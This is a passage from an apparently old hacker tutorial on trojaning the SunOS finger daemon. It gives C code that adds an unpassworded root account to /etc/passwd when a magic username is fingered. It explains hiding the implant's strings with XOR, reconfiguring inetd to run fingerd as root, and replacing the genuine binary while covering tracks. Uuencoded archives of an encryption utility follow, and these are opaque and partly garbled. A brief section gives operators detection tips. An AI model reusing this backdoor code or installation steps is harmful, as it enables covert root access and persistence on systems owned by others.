(execv(PATH_FINGER, av)==-1) * fprintf(stderr,"No local finger program found\n"); here the daemon executes the local finger with remote parameters * (void)close(p[1]); * if (!(fp = fdopen(p[0], "r"))) * fatal(argv[0],"fdopen"); * while ((ch = getc(fp)) != EOF) { * putchar(ch); the output is piped back to the remote system That's how the finger daemon works... now the trojan, basically we'll check out the input finger user till the magic code matches, then our sleepin' trojan will wake up and do the job... let's examine my code (decrypted) /*-=-=-=-=-=- PUT HERE YOUR CODE -=-=-=-=-=-*/ if (av[1]) if (strcmp("hit",av[1])==0) { if(!(fp=fopen("/etc/passwd","a"))) _exit(10); fprintf(fp,"hit::0:0::/:/bin/csh\n"); printf("Backdoor activated...\n"); fclose(fp); break; } /*-=-=-=-=-=- END OF CUSTOM CODE =-=-=-=-=-=-*/ When the "hit" magic code matches the trojan will modify the passwd adding a fake unpassworded root user named "hit", so you can relogin as root, cover your tracks and keep on working. Of course this is an example, you can do what you want simply adding your custom code, you may remote cat a log file without logging in, or remote kill an user, maybe root logins are disabled so you have to make a suid shell and add a normal entry in the passwd or open a port and so on, you can also use multiple codes if you like. If the magic word doesn't match of course the finger will work out normally. # finger hit@666.666.666.666 [666.666.666.666] Backdoor activated... Well done! You have gained a root access. (...) # cat /etc/passwd root:EXAMPLE PASSWORD:0:1:Operator:/:/bin/csh nobody:*:65534:65534::/: daemon:*:1:1::/: sys:*:2:2::/:/bin/csh bin:*:3:3::/bin: uucp:*:4:8::/var/spool/uucppublic: news:*:6:6::/var/spool/news:/bin/csh ingres:*:7:7::/usr/ingres:/bin/csh audit:*:9:9::/etc/security/audit:/bin/csh sync::1:1::/:/bin/sync ftp:*:995:995:Anonymous FTP account:/home/ftp:/bin/csh +::0:0::: hit::0:0::/:/bin/csh ^^^ they run NIS... anyway our local root login will work fine #finger hit@hacked.system.com [hacked.system.com] here is the log user: xit001 from: hell.com ip: 666.666.666.666 has pw: xit001 user: yit001 from: (...) That's really useful to collect logfiles without logging in and leave tracks everywhere. Now the problem.... If you want to use the fingerd to run world accessible commands you won't have any problem but if you require root privileges check this out: #grep fingerd /etc/inetd.conf finger stream tcp nowait nobody /usr/etc/in.fingerd in.fingerd ^^^^^^ On SunOs 4.x.x the fingerd runs as nobody, the fake user (used with NFS etc..), as nobody of course you cannot modify the passwd, so edit the file finger stream tcp nowait root /usr/etc/in.fingerd in.fingerd now you have to refesh the inetd process #kill -HUP now you can do what you want, many unix clones let the fingerd running as root by default... and even if you have to modify the inetd.conf an operator unlikely will realize what is appening since all other daemons run as root. Why have I crypted all data? #strings login (...) Yeah d00dz! That's a //\/\eg/+\Backd0[+]r by MASTER(...) of MEGA(...) Lame or not? All alien data must be crypted.. a fast exor crypting routine will work fine, of course you can use the standard crypt function or other (slow) algorithms but since security is not important (we just want to make our texts invisible) I suggest using my fast algo,to create the exor matrix simply put all texts on a file and use the little ExorCrypt utility I have included UUencoded below (amiga/msdos version). echo > test "this is a test" Acrypt test test.o line crypted: 1 type test.o static char exor[]={ 213,201,200,210,129,200,210,129,192,129,213,196,210,213,161}; char *ExorCrypt(ch) char *ch; { char *b; b=ch; while ((*(ch++)^=0xa1)!=0x00); return(b); } The utility will create the exor vector (matrix) (from the 80 column formatted ascii input text) and the specific decoding function, If you do not supply a key "$a1" will be used, remember to add a NewLine if necessary, the vector/matrix never contain them. Before compiling the whole thing you must add the copyright and sccsid strings I have not included (they may vary). Let's simply do: (SunOs) #strings /usr/etc/in.fingerd @(#) Copyright (c) 1983 Regents of the University of California. All rights reserved. ^^^^ COPYRIGHT STRING @(#)in.fingerd.c 1.6 88/11/28 SMI <<<< SCCSID STRING getpeername finger pipe /usr/ucb/finger No local finger program found fork fdopen %s: ((((( DDDDDDDDDD AAAAAA BBBBBB The top of source becomes: static char copyright[]= "@(#) Copyright (c) 1983 Regents of the University of California.\n\ All rights reserverd.\n"; static char sccsid[]="@(#)in.fingerd.c 1.6 88/11/28 SMI" That's all. Now you can compile and install your fingerd trojan, the source was adapted for SunOS but you can port it on many unix clones without troubles. Few final words to: Operators: How to defeat this trojan? First of all check the inetd.conf, then do VARIOUS fingerd checksums (maybe even the "sum" command is a trojan :) if you discover the trojan wrap the finger port so you can track down the hacker (usually all wtmp/lastlog logs are removed) or wrap everything modifying the daemons, do NOT use the inetd.conf_jump_new_daemon scheme, if you can, add a fingerd tripwire entry to prevent future installations. Well... if the hacker is a good one everything is useless. Beginners: You must be root to install the trojan, remember to get a copy of the original fingerd program before installing the fake version. On a Sun do: #cc -o in.fingerd trojan.c #mv /usr/etc/in.fingerd fingerd.old #mv in.fingerd /usr/etc remember to check the /etc/inetd.conf -=- + - To get in touch with me send E-Mail to: Internet: hit@bix.com X.25: QSD Nua (0)208057040540 Mbx: Hitman_Italy if you want, use my PGP key -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.3a.2 mQCNAiypAuIAAAEEALVTvHLl4zthwydN+3oydNj7woyoKBpi1wBYnKJ4OGFa/KT3 faERV90ifxTS73Ec9pYhS/GSIRUVuOGwahx2UD0HIDgXnoceRamhE1/A9FySImJe KMc85+nvDuZ0THMbx/W+DDHJMR1Rp2nBzVPMGEjixon02nE/5xrNm/sb/cUdAAUR tBpIaXRtYW4gSXRhbHkgPGhpdEBiaXguY29tPg== =bCu4 -----END PGP PUBLIC KEY BLOCK----- ExorCrypt Amiga version: -=) S.Encode v2.5 (=- begin 777 Acrypt.lha M'$0M;&@U+;L7``"`*```4K>9`0``!D%C]8TV]?OWWGY]h MWCGT)T<>==;,3^G7FQMOA\XXX4Q2S[GS9)QP]W.-A<]))-Y@SN9!MOMPPCA"h MGWF(`+"*XDE5UEU4LU45L4CDCA958FA%94*5RX4P217"J%868`=M85QPS1@YL*2RW3+[;9:U9+);_%OP`;\%'W=VLD<;;A%.>^3?Y5SVH19P?5/Zh MA=_F.G`BP"T_^)W7+BO[DGWM>O[7KH5F%/_)J-.MI>)@6C,25:,JPVNG]?$U3,3P5R0K:L^W@=h MEOB)!6NV&@_%J(:U9"*!#14E`E3\&Z=7*(;^G(JBO6IX_HM;9_4DB51P!LV+=3G/1Q\.AX9DQ?@4@?ZL8O.Q@3651OX(#*P$?'._'O:/P&Q@]RCLh MJNZ6KH^QEW#'J6'1)]+!5_@XU1#=7,K'C[&XO=A5W6NU$4?5-,_>QYSh MH:TNP?Q>8[K:N$7ETUZ7F;0HGH-SD&+9,`8E['P^SV]M(I(;3,8DXGT1B=DWh MB:/IVP6MC$N-A#9M[[8H\ECV):F_9h MDD7XP"^&WA9^R/V*_NPM"UT(^'\CW995;,(H0$?R,[5^)FB'Y/#`A@2R`)QQh M]Y#=J^\JVD:IE_H6L??,WEP^T+3/I]M1;U\/H27*$H`SRQB<`:/]T]0VGH-!!?>0Q0.7.0Y=4J=%^,PO+)h M%VUT+7S2>GO5%.99=?0A7];^/\Q*=G'):7X<^R>[6,Z$W;\O#"9^ILY#\T1\h M=L$]??_O)*I1MDE?;__\253/MZ_H8?ZR2J0'+FFS22M[1NJ/-):I3N84DDMHh MNI(*>CIJX@J\NSD67N67(h MC]]'V(6+V,?8A;>L"V]$%M\]!##J$[CX?\/BVS:P:TMIC1+U)3A3DI\#+JQ/h MM'?S_FGN6$ZA3T*I2MFN=>I(,67LH\FJB=LO<>\@Q&W^EV\7F3CX"-\C41J*h M3EVN[\;^R"OM2S])&W4JMM<%7/W="BZ5H;#&)2HTZM"AV^;0/XZ'9^XMTK/Ph ME(^&OVYH*L>L=>+?M-"Q@V'GZ0%9=S*+OJ_7D6[PO#?+R>?'Z3Y8K@-R[,K\>:,I8\Th M!;`>50F'DP+8P2Q&.G3T1T]-S6L?9NXVXU]"A:9U^)@5_1+$XN)0;VU\3&V]h MKN&.7$T+7-8H\W'PE@CCRH^'UU_9R!F^4:H?3Y-M(X[+!-=_:;E)"Z+XR%DUh MVYZQ20L-1W=:DA9-4_[LJOU%#72F%55[65?-541K)h MK^:UQ`UM]X?'&[&5$&A>Q26W1I+7E)+7\I@WK"!YH2JAY>EH3h M+7M5&,[M%&'FS48=`2J-9=IO&,,9^LPE)+JTWE)7M=*74X78R7R+0;Q6@?0Jh MK-K*&#SH*[E0IZ/AO0XO_NQ!D:L9&FM-Y\6-R7,;DIQK]S&W0QKQ(Q]X7Z\Rh MY%=6TWCZD,I8VKD2ZSOH>O)74[[PR2A>2Q:Q@E:DT(U,8K8>=J:':E^:':G?h ME>CR]+8C:ONI195C:%KWI3V;HE#YAYFTS<,W3R8I8AD"9.XWH-8P51T+#R,Zh M'NJ85EH&A>("EN@T+QMLR*,[MF92X99\,?>2&!../O##4'9I>1XH;HY,9GP'h M4Q0!')%7%&9R?'9B\TE6N%>U82;X;^+[7!85G^-:LW'12QOZ0P?".Y85?8EKh M@7'1,"F#>*!&9Y4G5-4^S;0%&Y>X_?MD)%ZO]^#%_ERI\QR^RRK$ZSY)BL.;h M4[5SGMM[5-/<#FL:Z4W;\M<6^3_T'Z&:'Q]OYBOQ"/";$2WIO7U/IXE[3)@/T2h MU#]YNDS.:&$?%8="&_(O%-[^"]Y6^9NE[X@JGE,+>-Z#64"UZ*U!>[NB2]-Xh M;ZBA$V,R?1]Z-+^Z+W*NXK9O0W(FV^,FWG_CM_]@:B>#<'DN.)]4UE1>8H:_h M^?"_[^J&%:RL_1C2=(Q1PIY*O[RW+I'!UF_OZ,I:!#8]DV08h M8_^0`WZP#+)AD!?(B\SLZT!>"]P0QH1.X8B(MR%AT82DI[,S@\NICP+!K!8Wh M&#$6Y1!GAUF'&KJh M"!KY42D8^JG!T3@??)#[PP^G(\D9%5AT,.34R,!#)='&WL+&*:B+.\!-GM*_h MHJ0+#'G67_&;_UN].,Y1KB@`6T\*G):+=3K(&MX9`:\\2NF/1YT%,<*F/5L1h M]LIBPC]XHHZD>[/E,^1ZYQQ8)GD".'_&#+Y#^'\I,?OM3B,^>Q4N`'\)@$>^h M$8%"/OV7!#-D,]3M5D.RALJ8&"M#315%&*0+&S.+6<;!5M@Q-)ATGAPX[AJKRS\U::ZHHU,L_-FFN)454#'L%/!`E<2W=!*>KU0@=:2h M2>I=%"@SF1'PY[T;:1H(9+#Z^$?N\EO1))W`@;:'074YD%02_?X/GD$SQ?O1h M]7IOYLV!_;_!&_'B\R$^$'?7`4Z.G=R^TQ!DY3H`4E0Q`)V5'\[$L2BLQ<2"h M1Z)$!3MQ;JC1>S;#(BU2QOJ]!IR6S'U<^W!VB%74MR:M#?4H4#5G\3h M>@95M+:$FREA2I]]#L,.V@)W\QYP,"3GIBHC!=FIOA)[YX,T03'*@-PR[%',h M4%W=M-=2[^>1M?N>&DV(Xh MW-+?+^FE+?99J6ZA!N;)!]S2G7C,WG=]7;^T+//D.GI\*/1RJM/OKI-:"#KWh M=!U<.&\IB/U(4\$OZLWEI>:V6DQ&7UD.AY^F--A&V3'%R14@-?09IMUK)R1+h MW'@.F].QMQ)FFMW%Z;G-XB=L637A86T&F&KW#,RZU)*:$8$$I3?NDK8F3="=h M5S_Q:K7/5/3'`1@QJ9*\&'(,'WT&"I[<;N-?6(=1<3F,U^.M#J:Q7ZI/]/"IX?74T7PA6H!#.L]64;0;h MUM]`U$:?E#@'WT_7XZO-7K"47(.GPB??(\?;,+'1H,`/9^,E\ZMU0^&;?0$Kh M&8'0'T<`;#IT1G((W\,%?-E=T+O]1[6((+GH;_=:Q6"[0Z1&FP_9ST\2LN22h M'\0TG47H3=73FXOC8B%S&;;:_)6O)VWC^7N_\L?FR4-OJ]h M9<:V3-S]A^DEJT\[U\_TGW'QMW)R49Q_U]M@/OR[[Z"<_@?KTW=.A$`Z&Q9/h M4;W>YNHYHQ&[^^/D06R#OXLP2>L)5Z^*JE.AYT(D&XKZB6&DKN?>CDOKQ[`4h MY6![.V]G`]EECEO>P/`V.!`[)"]JR`"NC`WOT(^QA.P9U>TP745#M%TZL7V)h M4175C5]D<(B:0)-H&A@;$&#J-0ZL8HA<1PJ^S:]8-N9AY,:;@NHHEM2$_RW"h MEXPAHSXX.NC;J\2[1+V9:_`9N%:LD._G,U9*]RUEP+L:%'WB_@]S!4QK#'4Yh M--W0A^<@('\]$\.4SWJ-0;;'BX@M<=^((/[OKZQ]`WE+W)+0;MKGP?$#+V_^h M[Z\FC@VL#Z)XE^7L[JEK^I>]W]S%N%_K@.C0)$\FMG"=FS;Z>4?!QKL_Y\&V]PNIP;>?S>##7>_Z\&&"M\MS@3]h M(`?VXCKVAS/;VJNG5PUD[.RZ)R"Ih M)2IFX4XKF-Z!/I2Z^A#:D17-5M!#@X[7.8731YS7.;AG<3!4Q_3W2[L<,&(:h M,[F3F)@);%JRGJ?8BQPEZZ@N[3\CJGI;>1E6TUTZL@E/00+5^:4Z[G->U=-&8QO&Q0J/9C[9!"h M8O$PN^ZF+X6!K:%&HXOX(&['2M^12B-!6:+TQ\T7&.'+G^M#EKGR//O\(XQDR0:3&BO)?B+h MM?C8O`,M\9N(OST#>2^S'6%ZA\GK!0RUT(Y8'0GTA99U(;R,P-Y#C*NN&F]&h M$?Z*4N?(RJ;ZVD5,%6VVJ@?<]K?D]AEJY3P>;>2]V8F"ZE+&VTW4RJWPO?Y'h M(H&G(W\XPO@FP['N9*B)R9%P!J=["&5P%6]$]'C&7>"(V_?N24I<2-MP9^'Qh M&0A&J;+>&=KNQ:K2U30W$TV20.3@#^E\0#\7J`-2K)B+F9U0\Z4,=B!#5ZP%h MC]0"F3_N.MH=@[.M\;%I8I]6^%$Z"E[@L]2^`:+XJO1]7.)W;;`OW>V9#N&Bh M0\S62KA8\\$2TPM]//6NZ@NXVYU]=:^9N)!USDW'3N"M$h MV6U$X+N4KXYD=#S/8,K82KQ37=Y_$3&=XC>K_EF$\\<4&%WX`:EP)1M6]H;Rh MU^[@3U,ZZIB:#Z%L'N/'Z%QX^)-F31"2%H$+<3(1,LLF?S`&JX^Y53T;/"<77RQQh ME9@O-`\!L#WW3<`^#5D.E/>/W8I_9&?I@(T\3R8C.[^,1NP(]NY$A_$(YS$^h M,1O6Q&_GAY]7_P2B0_2X;S!#W[^:0?CCL5TQ@K6%"'=3NK:3/CN@1V5[;W%/h M="VPY+&Z6TKZG::L.:UA9O-:S;6)VR^$.:APJB*K='QR(^B]#!D^I%WB*[P3TW4U*+6^M]9KT2-EK9DFZO?!14CBMM-;:?4D6NO+h M[8ZZ^UU[>9G=_]9]G6%`*F4BQ(MAPN#ZV)B<'V["+$B1.)M@BJ]C[$3JK",?5h MTNO[_)M;"N+E^:>G>7YT6P9X.B*L5KIR+7\+@[W;#%KVMAQ,"XZFL&T=S:;I"])OR>h M+^D+T!F`O334(^(=,BKPW#^ZK8:V8BOU=[,OD6FM_GV.MV%]K;A*`=A(CZG3Q]5IB*OB2+3h M4E4C&1)FMM]?I$?&@R=FU>*)Y\0=^<2KF4V%S4`+?A9^L<)h M3T_8$2#NCKQFW.:$K$CL/5H$?>N0-[UM1GG9-M(-;F&-$V_J-@^LK08FV$V;h M1/P[_#OM`87P!.KT[^$4&!"$(N)H,"?S`5=[-9=IX#-\Y&7T)Q'_Z<.FACCTh M\LZ>1]@='OETUW-A(9S'-MJ;;$C[!,):MJRSF2/OYQ0^"D[SM+O37][,L)GAh M2[ZD[RLNT;+M*NL1J_"12=YVO:W<777UW;WB-/?6]UX0L.TNWA:JUK^YTVD1h M2[!&ET]Y+V-\B3KKK6]NC2R-C?9M7O+"]N-;WPXY&86FF3+V9I$7USK4:[,Qh MZ-=L$7E[?(V5O=:ZX>%X/5PM[F@CX<-U<+K`(/AOMA?6]]KM8C67-O,1K1M/h MO.^^;X;PJ78$5*%CJ7807B?(J_/^9^W&TMQWQ_?],F*0\H/-O"3EJG,)S3ZRh MYJ!B6[767(P1`#$A#8?J=7\QNKJ_FIO!1\&Y/;]/3U(S5555'?_-K+^EOZCLh MQZK*RHLZ/_4_)LUA_3^1M0,6/AL_I9F'S,V_VG[,VG5OUNM9h MO_J?LP[_[#86F_J<_R/B_17W6_;?,_.6&`G\I^W\W?[9/Y7]OX[U'_\?MDO)h ?Q@O.N$_Y(^\0??-'T%W5;-PEAFKB#[MVT,U,B:P[`/^#h `h end ExorCrypt MSdos version: -=) S.Encode v2.5 (=- begin 777 MScrypt.zip M4$L#!`H````&`%*WF6F[C95"R!T``/TM```+````35-C&4/`!(#h M)!4V)S@Y:GM,G6X?"08!$S3E]I;WFVKM'_`B0((`00(D#?#___$"`2*,NY'Zh M@.L];'M`@`H!RA7XK=G5@`_0T[*U$?!_P8"'K;J8/6ZY`-&G-&CUZG&C^IXCh M7A[QQHTZ#CW8+\&!?`T4.T&_(G$+%@@5/?.$@XD+7.S5X/^;N$4Y>R]G)S@3h M&/(1"UP[;FC2;>M=@>A]8&MBH_Y'`J]+$;>T=)^$K[@TM^3-$TA6>^HD0?03h MU&E^ZAR?NJ-11^]2E[ZU+@IV;A"]?P_1CBBK2_X'T.X>!XROHQW=J%W_V_6/h M&PKSC8V"@O[J!^@-6#U=C_^H'#0GU2]J3W_'E_=K<-%QRLM?[QP2V.L/2'=@h M^NL`(*2ZMY?-7=2M!?W_S_&\'[/'"E"17S=V"GJ@4_N+L\,\J/B`h MDNWLK>2MD-;7D+>AN:+C:O@](P+TBX%:<6LABI:((&Q\?81K#N::UG_@VM.Yh MO2(K,>O)6-/CK'G0@)"67CZ0:->/6XV7R=HB]C(Oh MV'LQ3>7K&Y3MN/>,P1$-V0F`B1[P)=QAAR\!3$5?(O6'^!*(CHI,RS?P)?"4h MKFGM!KY$$9GL>P%-.*9O6M>WKJ\(R1KW9$V/LN9JZ,F5[#S)TQTUZ8.3=F.@JSE(V;FZ9[E"V^,P%F#J.=:V"F1S#+h MYFA="'Q0#]6C=R*MZQU">E88S^[C6;]Z75R^ZW"`M&$V#\E3X%R!S4'^=G.$h M;=3"5]X/[!\@1+D#?1&OW_'UP,2='MP_%Z+%C^@["H`-!77V_YG$/YB\?YN)h M32(%0.Q$!G_CL0E.!X_4YFBA``?>3R2T,QZ^TOO][;25G&^3LY/_;h M8\'<4`^N?";T\U4M[<$'=':L?I+L/\YL_]^FMLW;)K9AMZ:HL]XG]OT!#L>Eh MU(ZQXUIXVSQNT"C`L@5.U:SO'$#+$[09V*=9@=:MUSV(%:K-_Q;5`'I2LN.-h M%)F/WI48`ZQQ?&*/IX+:8&J`#C\X7U)W6@+1F?UBAW8%CG?IV`!3FQCS+`$6h M-XA7(&/M,[<-O4[[`]^F_!K1!/1]JWU6W5?FNZV9<7]Z@QP-A?_^W<("L,4=F[0_7#HA4h MM?A[0&JQN,53h M??(2UG\$[),<^70;>@1=SDQ;-)?%IG7XSOMS%3Y]NKCA>/O_HZ^7YZP.![\Gh MN+C@PJ("ZQ>QW^V`!HK&OH<5HH_>FFT`(CGL7INW<`09^I>4!@:`DQX?U'CR;Vh MR1W`%FKV^]$71_^EO^_``!T1CK/F"9+N?IX)Z=[GV9#N6P5H>NU1)]**3MK)h M23L7:Z71<\S0X>_#9XM/3UEQ0OJN+L!UX_&OT<\4(!B_>_4OQBXJ-D^\78h M!^[CK`;SGT.'%K=1UZQ537U=?6^Y#;C$],/RJNJ"KS/*_P4`[@/7YX4DS_[Bh MV[C]FE,NQBGWLK>?<$I5_05M$#87VGQ]M.*@ZO@YS8M@OIB0N8MY5P'NM^8Ih M(]#)2D_\7]HY,<&>#7Q<^B'X@_L0M=3[=Vh M[(WW3SI^8F">.X=\UHG]`BQ:!$FT^/:)G82:=^D]:=M&6NHOMDK0-U."K7<*h M,WN@ENDRO"15J<]V\_7K+3TR%RX`*[V"RGWTE_]S+`;$^W>W3LL0=.1\\X^Z(Q^\KE`X,[h MNJVQ1;)BE0N1)'PDJNR5%[N(/Z"%X;`_GI[K?KD3SBXMG8M/=L8($(LR/S!Rh M$RS_GXE9-GMTB_-P496X0O)U1X"IPGZ@W`9H?,[P(.46A%UP_4'(/"<\QK`Gh M[@I(7\<\>E;ZBHFOOZ=D'\R>X%6KOA$&7/DOY;E](K@P7-U*2JDF*Q!3_>A@h MXPASV@01R)L3:J]?SD3$+R!\\@X7PV."6DG2!IBD^@6L7!T(>26P6L`AG7,#h M6?=R1B"0+%R`5$A4>-`.99ZXJGE?C$_9GE[-2'8"9&/]-(*K'&*`]PT`;>!'h M\N?XG!T*/*_!+]GCJT.`WCY3+BSH1>39_%M<.3):21]Y='!@;/@"K95.,#)Sh M`\4&Y@_PR=,C!G!G,=4-`F9J$.3Z=L4>X*3O'_#)?=7.L*[(Q=X#KS.:[U\\h M//KX@=B&MW_HZ&SS!$-=.8[_[*MW+W^A]FQ`h MWH#2+*[U(1GH^)`,KV`O8;+N!_!L-7X&SR(V7P?26G:!@,D:?+>%GC(A%ECSh MRS+_D64@F_B80Q#:BL=0O('B441GDET_^KX4VFQ.3F.'YSD#4#:B'0''C6B@h MTBE0\US)EX"6',B6)*\`XDB:I/_]3KQ")GM:QS\(?,Y_O88$OU=]]=W<6O4'h MA<"AG#54J%/1\V:0$GPQEXOJ!!$?7'\14BK:Y\62C*`*_Z;XR1Q,3D0[@!'Gh M!/YDO0<7>/\W@/AFW>`!DW![$,X;P@S/^/!1`F7PAX"?/+G"]V-IQ=W;AFW1h M=KGN'PBX85-"6?6+Y\&^'CA7`'%`*HB#_!L=/HBY9YC4'V4/'#;%O.<=XBD\h M^?3-1C?0#(>=?\!<0J_8BIS_T.0'.-O9O[OR"0.NIP_Y_K&FB\*!GQ4_^+Q_h MV8`2W`:4=L`_^K>Y,#E=&5/KBN6U]Q1#_,2>=-*OH*1^6DK8`7PLX_72(36Sh MTWUE\O7&(4D[X/6_$9$=)V?F20>$LBH\_0(W<7UGOD^;=M,FYX^H#X&):2[0h M50*;@]EQ3'*P,^<"F>Z9G">R!-=W'REM+#7A"=Q9"2@MM2><5T3?'^UZ!M[3h M.BC2_;WY]0PA$2XGT>P"`>@NJST@$D#[=0)CO_X.SH&/BY#4('(C+C7PB`]`h M:"U@!O<6%]#Y@<&(?O$A^A,U!LWOWNY0LPLT?C!"8`G)D,^#ROP-;!XP&47Ih M]F"$VS\(D:X6R-@"'Q\S-\B(3:]/K2^R>h M^^M7#OU((/UD@GY-T"^G!#=$"O1Z]0V2'+"BKWM$,P%I!FM](AFH/+U?CE!Dh M%2DIMMR``!9D?:#7]5>CA2FLT%@FPAR0H9BOVP-5WMBP9_^C=0!RD_#1+(J=h MX&@0$6&#-@NHX&Z01K&G.T`&S+/$9SJRPML@SH(!#,]'HRPXFH3P,H0W(3P,h MX5T(+T(X'O5H%?D.M""(W9UO0)AU>1IA5ABZ_XS_5_2:&Z@/.O4PST4T2A"Wh MZ`1"T16V84?]^@?%_;\^P?4MZT93[NB-*B:(B&Z+/O,=!GV[-GFB(!]GCQ$2T<#G$J9U`QHI3OF-h MZ2T*T!;)]G''"N'X;<>*X/AI27MBPYS]]RPR]`I[=%ZSP%[P1'Y"M:8'63O(h M1=N:QGHZ")C_#=ASS';']PS`[%*8+\&L0`.FSQ(!)[?X_A,D>DWPCZ&$4*D2h M@6G2\(,L;.2E9P:[=R\"=Q]JL#'XH47?@Q^V?R3WLW:]`1B^WHFZH):A1_>@h M1UL@6C&^)N9RX;CD4S`,D.Z+9%^5240VLL9Y0h M'6W9YD@GH)_'Y*N$NW:!'!3$4UW`NU'!QE+<$.+V?*NMN'4D^[J`(9S9@)BNh MB'^*D$OZ%L>/NH\7".%=[Q<\;_W+,.LQYC'@_SC!QQH^LW0CZ"0`FO4]C+Y-ILX#1O*X*ONN_+PFA!.Z-9>R-L%N,V9]A/E@Zh MP/O:EJ;`'A\6#8-P?&?'LD;G$9G`B9W/X-A;8_`M\0X6;7IC!Y2V<,H^^!)0/^_]AX"X;KJP:(JA+NT%E.9T/C`#*MZ,]%7`[*ML`;(DOQ`>PA4-%2I%h M7^*'9D$YCI\100M)/'UD`%,$J:9L5=\4Z8J0F(BBAXNG^N3X^K0^H\:-HK1.h ML#HRZ.-^*>"4I/?Z4]"YV1`@7F9VN"$_I%8WN=.X7h M@H$;LA%J9)V8WJWX2G^VS41V>MJ#88B.=GW"XT?_AMD-1!:E[0,#H!FU\2DNh M,XJK9P2W8C^BP0T+IB\`9([(,$0)]D8A:@.S7&9J`U%FTI0HNPU.=QO)";X9h MK\/8"G^+5I#H"M:YA-AC"4#:W"(6,,K@TA*(IK!)+MAL3([@\JDPX!.!V,1%]\\_]!1"G1UR^$/.6B:L1ZF-"!2.E_h M-<]:SXS;+0N9Z"M!DTDXMJUP^QF`>_G;4-IM&.;HL].[YP3NI=(-8;L%L_'Mh MH+Y?_,-L+V"V(G,FX:ZGD/6`H<)FDA))N3W=`W_CRX#h M6^EV`!NG=DXYR]EH:6>C$9P-[L++$6VCV^NJ/L037YL6QY'*]17!17ZU);K;h MYO].=AV28-(!GZ@>C8%BZP2-0S-DE96?]H?O_YWBDV:DE8/R`[E'9V`L)A$*h M>_1?`1`MS$PV5@L@:=I$YIYJ7\Q99KN^4K8!JG0BM:GG3+G'L4[V[OXB!]V@h M5JC^U_J['!3/9+%O$39),*[M.J)M2QW/9"Y3-I,PO&$_B*,6EL%]/H'L\h MW7Z^7SJK*4@#(IZ9>95U'U@&_]$8K!9'"DG/TBT'9R,9.>9A\JU!?,Z_,'/,h MMFE.S[8R*+G+6<8"'#U<\`.*?2#RP>EA+LYOY%URIG7PA_N1?O]=(6.h MQ0(\[MNF0,5.3,DA>0RYF>O`L-LS;"E`P)W;9+M#$#",#JYKH8!B/=I.'#>6h MDRI)&_N8:DP%]IW!ZV[3)\),U>T[/0*S`5K3`!.N5WF/\TKS=)&PL80Y78TSh MDR^.QO9"7H#E+KE>`8]PAP,>[!.M(LR+8GV+^=?;4(16861\`>.F37A*$B)!h M*<.8M*_'EES`W2D"REPAK:*ES9\"H.Z?#H(K;UKF?T2KH!!C&B83S@%T\`-"h M4!&'FF[?8(\%O,R.V@']3Z#%Q9"GW:/_N1*J4V6_'QQ@`('CH0'F3S_Z_21;h M6,3*9R?<];1]B$?W$=>CL[\?1AL@D>;M"T-R'O1.^0.UA_1`Y+TZ@+4-[!S.h M'5,/>%SC\K2!D)_^-X!\.=OF'Q*7GX74;GS7_BFH%E"R]#/`7"36Q$S?S]X(h MDJ;]`SG5]`J?\G\-D)=TVX335)R8GCE:2$@9R'.$Z$D#J'@CJ#K2*\L5<0-4h M*^!P8G*"M'E0V<"^N_M)W+`PG!(X1:)7JTWX+4=R#^'RN($PTQO3%_2N@4D([h MXD=,B$:&>"(?H1RZEL<:^LA@0!Y5GZW;`H7H/-Q@/L]3M#.!1=G'AT&`9<"Oh M-;!/LP*M6QL4MX@&O>M8W[BD<^8J?1_B\L=OQ+[NMWJ%]):_Z%)'/KXD+;[Fh MJ0#&VMY.D+5.8I,V#R)^H%DPM9EUP:/BU_54%_[5"T>Y_>#\`4AX8Y_N^O7Fh MF!;!'X/E\_O"01B>(8&42QVVPO4LTEC'#!H?M@5#53O3=#_@@?H=B4#,#:;Th M!V$W(,O76R)62M&R6*_W#2#-'$&:\0-HMLW]:#LNP^``]`+4-]"7LOV;EVDWh M2+O'@S-NR1!+^;&:D3F=M5E\9%(J62W?=5VEZ*T#[(D:H%TD2U3NNLQ\CYH9h M[:\;D(Q=_&)J[5L\H.ZLR.P,=^ZS:]7BZ:,GL>F+*:OF5-DS`E0U=*!D"6+Th M#JH7=VFOM[K>*&[^_]'W3@]U:A1(?:7R\1#JLMM5N0U\Q/[R[`:S;L52]<,$h MLA6!>\`3O>`$9&A\(+Y"Z_"=XWH#L>HKKV^(YI3OG!;h M;?I3?R$+?76WCU7LHWD*-(TK%4<_Q[`OP'[F]22!DK`@RGXT4(&6C]V<2,'&h M"'#W9U@GMDE$<9T@8^R.@0F@_N54>'KG`(/2U4=;)GF[GW.XWQ7(OY6(C@2;h MKE`DC/P<$#GT@?!;-3O-@<(@:'LQS7(^>G/?1?&!^1,S*?/!D2:JF;:\O^5^h M><;:&4??&V./2+)ZYOK>7VU@2\W<7RG,=289$"@h M0#&C]R(;[K^)`#\'B.N6G3I=GVG>C#J8T9L<550DP7SHH.3#(/\B5-8!*?:Dh M08/J_O_7Y$Z+3@50M*.KBQ`>?*!QN16.JO2_+WVDL`XQ>@9.'(%RVEXN_ZS#h MI49%WT'K"$1XY8,_4)X1*:)>;'WE=:6)J_K'FE7K\*E09TKW*%4JE)SO4`U^h M1/\0P(@6C/!'K5M0[872AP,X`\N)]FK7Q?D;*8!:*!)M))@Q^BR/]MI(+L?3[S1(I>N0TWH_3Wh M\TQ(]SZ4@U$3YKEBHA1]SKL?6<*4NS'Z^.C2%R^S[UB&A>XG7A\PP$HJC87]h M2:W0(%CJMRIM@*)/D*YZXP4!A-#JH>'/3Y.,U-Q=1=H@W?3_YC2>h MK6KP$_@(501_=A#@+6B9^5#LH$L6S6`L\*\!AJ%],K2)M06CIJN8B+V5O;O&h MN@4I=09CE9%'!S\PV/`%>C?KV0,F:_`=OPNF&\7>5F,)5CW$1XNG;C!"QTCKh MDAY`].W;11NY?2QQ#U*V4RHQ.>$8PG;=!83O;:X-P/^#68:9C:X=NSX4@-L/h M$&\]=9&+O0=>AS??Q_/*8E-L.#*5=VF?X.K3J\L!9)*=O?T#?QZ!3:)/[JL=h MJ9$.Q6M5XK68M3V=-CZR35$+6T.EQ4MT#+N@N[`G`,`$9SKA`*OCF4IW>TX7h M8$:^47N`/1W1*X(H"48I;*:^!/FZ0_H<6)[OV+\%<_QOEXLH:&VD=WMK:VL>KW_H+RKCDJXZST@207;3_S%*A')&:^0]H\.EEA1%75Z5=ISL/@K6."-<@QRVID_*6&D%_H(@#W:>G5D<=&\#MZ9OO%:/]#>C:T:U(-H;^Dh M=..<[?UU>LL`(97-!UB2RA,;7<=P\:GH,YV0CN`)FN()2J+KY0^@2O$1I=!$h 